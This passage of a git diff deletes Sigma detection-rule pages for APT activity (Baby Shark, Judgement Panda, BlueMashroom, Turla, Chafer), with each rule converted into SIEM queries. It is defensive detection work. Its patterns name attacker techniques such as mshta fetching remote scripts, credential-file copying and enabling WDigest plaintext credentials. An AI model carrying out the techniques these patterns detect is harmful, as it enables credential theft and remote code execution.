-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_apt_apt29_tor.yml): Aggregations not implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### splunk
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_apt_apt29_tor.yml): The 'near' aggregation operator is not yet implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### logpoint
-    
-```
-An unsupported feature is required for this Sigma rule (detection_rules/sigma/rules/windows/builtin/win_apt_apt29_tor.yml): The 'near' aggregation operator is not yet implemented for this backend
-Feel free to contribute for fun and fame, this is open source :) -> https://github.com/Neo23x0/sigma
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*Google Update))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_babyshark.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_babyshark.md
deleted file mode 100644
index 6424c24..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_babyshark.md
+++ /dev/null
@@ -1,191 +0,0 @@
-| Title                    | Baby Shark Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects activity that could be related to Baby Shark malware |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1059: Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)</li><li>[T1086: PowerShell](https://attack.mitre.org/techniques/T1086)</li><li>[T1012: Query Registry](https://attack.mitre.org/techniques/T1012)</li><li>[T1170: Mshta](https://attack.mitre.org/techniques/T1170)</li><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1012: Query Registry](../Triggers/T1012.md)</li><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/](https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1059.003</li><li>attack.t1059.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Baby Shark Activity
-id: 2b30fa36-3a18-402f-a22d-bf4ce2189f35
-status: experimental
-description: Detects activity that could be related to Baby Shark malware
-references:
-    - https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
-tags:
-    - attack.execution
-    - attack.t1059
-    - attack.t1086
-    - attack.discovery
-    - attack.t1012
-    - attack.defense_evasion
-    - attack.t1170
-    - attack.t1218
-    - attack.t1059.003
-    - attack.t1059.001
-logsource:
-    category: process_creation
-    product: windows
-author: Florian Roth
-date: 2019/02/24
-detection:
-    selection:
-        CommandLine:
-            - reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
-            - powershell.exe mshta.exe http*
-            - cmd.exe /c taskkill /im cmd.exe
-    condition: selection
-falsepositives:
-    - unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" -or $_.message -match "CommandLine.*powershell.exe mshta.exe http.*" -or $_.message -match "cmd.exe /c taskkill /im cmd.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(reg\ query\ \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal\ Server\ Client\\Default\" OR powershell.exe\ mshta.exe\ http* OR cmd.exe\ \/c\ taskkill\ \/im\ cmd.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/2b30fa36-3a18-402f-a22d-bf4ce2189f35 <<EOF
-{
-  "metadata": {
-    "title": "Baby Shark Activity",
-    "description": "Detects activity that could be related to Baby Shark malware",
-    "tags": [
-      "attack.execution",
-      "attack.t1059",
-      "attack.t1086",
-      "attack.discovery",
-      "attack.t1012",
-      "attack.defense_evasion",
-      "attack.t1170",
-      "attack.t1218",
-      "attack.t1059.003",
-      "attack.t1059.001"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(reg\\ query\\ \\\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Terminal\\ Server\\ Client\\\\Default\\\" OR powershell.exe\\ mshta.exe\\ http* OR cmd.exe\\ \\/c\\ taskkill\\ \\/im\\ cmd.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(reg\\ query\\ \\\"HKEY_CURRENT_USER\\\\Software\\\\Microsoft\\\\Terminal\\ Server\\ Client\\\\Default\\\" OR powershell.exe\\ mshta.exe\\ http* OR cmd.exe\\ \\/c\\ taskkill\\ \\/im\\ cmd.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Baby Shark Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" powershell.exe mshta.exe http* cmd.exe \/c taskkill \/im cmd.exe)
-```
-
-
-### splunk
-    
-```
-(CommandLine="reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"" OR CommandLine="powershell.exe mshta.exe http*" OR CommandLine="cmd.exe /c taskkill /im cmd.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["reg query \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\"", "powershell.exe mshta.exe http*", "cmd.exe /c taskkill /im cmd.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"|.*powershell\.exe mshta\.exe http.*|.*cmd\.exe /c taskkill /im cmd\.exe)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_bear_activity_gtr19.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_bear_activity_gtr19.md
deleted file mode 100644
index cea6879..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_bear_activity_gtr19.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Judgement Panda Credential Access Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1081: Credentials in Files](https://attack.mitre.org/techniques/T1081)</li><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/](https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1552.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Judgement Panda Credential Access Activity
-id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
-description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
-references:
-    - https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/
-author: Florian Roth
-date: 2019/02/21
-tags:
-    - attack.credential_access
-    - attack.t1081
-    - attack.t1003
-    - attack.t1552.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection1:
-        Image: '*\xcopy.exe'
-        CommandLine: '* /S /E /C /Q /H \\*'
-    selection2:
-        Image: '*\adexplorer.exe'
-        CommandLine: '* -snapshot "" c:\users\\*'
-    condition: selection1 or selection2
-falsepositives:
-    - unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\xcopy.exe" -and $_.message -match "CommandLine.*.* /S /E /C /Q /H \\.*") -or ($_.message -match "Image.*.*\\adexplorer.exe" -and $_.message -match "CommandLine.*.* -snapshot \"\" c:\\users\\.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\xcopy.exe AND winlog.event_data.CommandLine.keyword:*\ \/S\ \/E\ \/C\ \/Q\ \/H\ \\*) OR (winlog.event_data.Image.keyword:*\\adexplorer.exe AND winlog.event_data.CommandLine.keyword:*\ \-snapshot\ \"\"\ c\:\\users\\*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee <<EOF
-{
-  "metadata": {
-    "title": "Judgement Panda Credential Access Activity",
-    "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1081",
-      "attack.t1003",
-      "attack.t1552.001"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\xcopy.exe AND winlog.event_data.CommandLine.keyword:*\\ \\/S\\ \\/E\\ \\/C\\ \\/Q\\ \\/H\\ \\\\*) OR (winlog.event_data.Image.keyword:*\\\\adexplorer.exe AND winlog.event_data.CommandLine.keyword:*\\ \\-snapshot\\ \\\"\\\"\\ c\\:\\\\users\\\\*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\xcopy.exe AND winlog.event_data.CommandLine.keyword:*\\ \\/S\\ \\/E\\ \\/C\\ \\/Q\\ \\/H\\ \\\\*) OR (winlog.event_data.Image.keyword:*\\\\adexplorer.exe AND winlog.event_data.CommandLine.keyword:*\\ \\-snapshot\\ \\\"\\\"\\ c\\:\\\\users\\\\*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Judgement Panda Credential Access Activity'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\xcopy.exe AND CommandLine.keyword:* \/S \/E \/C \/Q \/H \\*) OR (Image.keyword:*\\adexplorer.exe AND CommandLine.keyword:* \-snapshot \"\" c\:\\users\\*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\xcopy.exe" CommandLine="* /S /E /C /Q /H \\*") OR (Image="*\\adexplorer.exe" CommandLine="* -snapshot \"\" c:\\users\\*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\xcopy.exe" CommandLine="* /S /E /C /Q /H \\*") OR (Image="*\\adexplorer.exe" CommandLine="* -snapshot \"\" c:\\users\\*")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\xcopy\.exe)(?=.*.* /S /E /C /Q /H \\.*))|.*(?:.*(?=.*.*\adexplorer\.exe)(?=.*.* -snapshot "" c:\users\\.*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_bluemashroom.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_bluemashroom.md
deleted file mode 100644
index 158de80..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_bluemashroom.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | BlueMashroom DLL Load       |
-|:-------------------------|:------------------|
-| **Description**          | Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1117: Regsvr32](https://attack.mitre.org/techniques/T1117)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unlikely</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software](https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1218.010</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: BlueMashroom DLL Load
-id: bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0
-status: experimental
-description: Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report
-references:
-    - https://www.virusbulletin.com/conference/vb2019/abstracts/apt-cases-exploiting-vulnerabilities-region-specific-software
-tags:
-    - attack.defense_evasion
-    - attack.t1117
-    - attack.t1218.010
-author: Florian Roth
-date: 2019/10/02
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - '*\regsvr32*\AppData\Local\\*'
-            - '*\AppData\Local\\*,DllEntry*'
-    condition: selection
-falsepositives:
-    - Unlikely
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*.*\\regsvr32.*\\AppData\\Local\\.*" -or $_.message -match "CommandLine.*.*\\AppData\\Local\\.*,DllEntry.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(*\\regsvr32*\\AppData\\Local\\* OR *\\AppData\\Local\\*,DllEntry*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/bd70d3f8-e60e-4d25-89f0-0b5a9cff20e0 <<EOF
-{
-  "metadata": {
-    "title": "BlueMashroom DLL Load",
-    "description": "Detects a suspicious DLL loading from AppData Local path as described in BlueMashroom report",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1117",
-      "attack.t1218.010"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(*\\\\regsvr32*\\\\AppData\\\\Local\\\\* OR *\\\\AppData\\\\Local\\\\*,DllEntry*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(*\\\\regsvr32*\\\\AppData\\\\Local\\\\* OR *\\\\AppData\\\\Local\\\\*,DllEntry*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'BlueMashroom DLL Load'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(*\\regsvr32*\\AppData\\Local\\* *\\AppData\\Local\\*,DllEntry*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*\\regsvr32*\\AppData\\Local\\*" OR CommandLine="*\\AppData\\Local\\*,DllEntry*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["*\\regsvr32*\\AppData\\Local\\*", "*\\AppData\\Local\\*,DllEntry*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\regsvr32.*\AppData\Local\\.*|.*.*\AppData\Local\\.*,DllEntry.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_carbonpaper_turla.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_carbonpaper_turla.md
deleted file mode 100644
index 1fa6a40..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_carbonpaper_turla.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Turla Service Install       |
-|:-------------------------|:------------------|
-| **Description**          | This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1050: New Service](https://attack.mitre.org/techniques/T1050)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/](https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.g0010</li><li>attack.t1543.003</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Turla Service Install
-id: 1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4
-description: This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET
-references:
-    - https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/
-tags:
-    - attack.persistence
-    - attack.g0010
-    - attack.t1050
-    - attack.t1543.003
-date: 2017/03/31
-author: Florian Roth
-logsource:
-    product: windows
-    service: system
-detection:
-    selection:
-        EventID: 7045
-        ServiceName:
-            - 'srservice'
-            - 'ipvpn'
-            - 'hkmsvc'
-    condition: selection
-falsepositives:
-    - Unknown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and ($_.message -match "srservice" -or $_.message -match "ipvpn" -or $_.message -match "hkmsvc")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_id:"7045" AND winlog.event_data.ServiceName:("srservice" OR "ipvpn" OR "hkmsvc"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4 <<EOF
-{
-  "metadata": {
-    "title": "Turla Service Install",
-    "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET",
-    "tags": [
-      "attack.persistence",
-      "attack.g0010",
-      "attack.t1050",
-      "attack.t1543.003"
-    ],
-    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:(\"srservice\" OR \"ipvpn\" OR \"hkmsvc\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_id:\"7045\" AND winlog.event_data.ServiceName:(\"srservice\" OR \"ipvpn\" OR \"hkmsvc\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Turla Service Install'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:"7045" AND ServiceName:("srservice" "ipvpn" "hkmsvc"))
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:System" EventCode="7045" (ServiceName="srservice" OR ServiceName="ipvpn" OR ServiceName="hkmsvc"))
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="7045" service IN ["srservice", "ipvpn", "hkmsvc"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*7045)(?=.*(?:.*srservice|.*ipvpn|.*hkmsvc)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_apt_chafer_mar18.md b/Atomic_Threat_Coverage/Detection_Rules/win_apt_chafer_mar18.md
deleted file mode 100644
index e5b43d6..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_apt_chafer_mar18.md
+++ /dev/null
@@ -1,483 +0,0 @@
-| Title                    | Chafer Activity       |
-|:-------------------------|:------------------|
-| **Description**          | Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018 |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1053: Scheduled Task/Job](https://attack.mitre.org/techniques/T1053)</li><li>[T1112: Modify Registry](https://attack.mitre.org/techniques/T1112)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1112: Modify Registry](../Triggers/T1112.md)</li></ul>  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/](https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/)</li></ul>  |
-| **Author**               | Florian Roth, Markus Neis |
-| Other Tags           | <ul><li>attack.g0049</li><li>attack.s0111</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-action: global
-title: Chafer Activity
-id: 53ba33fd-3a50-4468-a5ef-c583635cfa92
-description: Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018
-references:
-    - https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/
-tags:
-    - attack.persistence
-    - attack.g0049
-    - attack.t1053
-    - attack.s0111
-    - attack.defense_evasion
-    - attack.t1112
-date: 2018/03/23
-modified: 2019/03/01
-author: Florian Roth, Markus Neis
-detection:
-    condition: 1 of them
-falsepositives:
-    - Unknown
-level: critical
----
-logsource:
-    product: windows
-    service: system
-detection:
-    selection_service:
-        EventID: 7045
-        ServiceName:
-            - 'SC Scheduled Scan'
-            - 'UpdatMachine'
----
-logsource:
-    product: windows
-    service: security
-detection:
-    selection_service:
-        EventID: 4698
-        TaskName:
-            - 'SC Scheduled Scan'
-            - 'UpdatMachine'
----
-logsource:
-   product: windows
-   service: sysmon
-detection:
-    selection_reg1:
-        EventID: 13 
-        TargetObject: 
-            - '*SOFTWARE\Microsoft\Windows\CurrentVersion\UMe'
-            - '*SOFTWARE\Microsoft\Windows\CurrentVersion\UT'
-        EventType: 'SetValue'
-    selection_reg2:
-        EventID: 13 
-        TargetObject: '*\Control\SecurityProviders\WDigest\UseLogonCredential'
-        EventType: 'SetValue'
-        Details: 'DWORD (0x00000001)'
----
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection_process1:
-        CommandLine: 
-            - '*\Service.exe i'
-            - '*\Service.exe u'
-            - '*\microsoft\Taskbar\autoit3.exe'
-            - 'C:\wsc.exe*'
-    selection_process2:
-        Image: '*\Windows\Temp\DB\\*.exe'
-    selection_process3:
-        CommandLine: '*\nslookup.exe -q=TXT*'
-        ParentImage: '*\Autoit*'
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName System | where {($_.ID -eq "7045" -and ($_.message -match "SC Scheduled Scan" -or $_.message -match "UpdatMachine")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Security | where {($_.ID -eq "4698" -and ($_.message -match "SC Scheduled Scan" -or $_.message -match "UpdatMachine")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "13" -and $_.message -match "EventType.*SetValue" -and (($_.message -match "TargetObject.*.*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UMe" -or $_.message -match "TargetObject.*.*SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\UT") -or ($_.message -match "TargetObject.*.*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential" -and $_.message -match "Details.*DWORD (0x00000001)"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "CommandLine.*.*\\Service.exe i" -or $_.message -match "CommandLine.*.*\\Service.exe u" -or $_.message -match "CommandLine.*.*\\microsoft\\Taskbar\\autoit3.exe" -or $_.message -match "CommandLine.*C:\\wsc.exe.*") -or $_.message -match "Image.*.*\\Windows\\Temp\\DB\\.*.exe" -or ($_.message -match "CommandLine.*.*\\nslookup.exe -q=TXT.*" -and $_.message -match "ParentImage.*.*\\Autoit.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
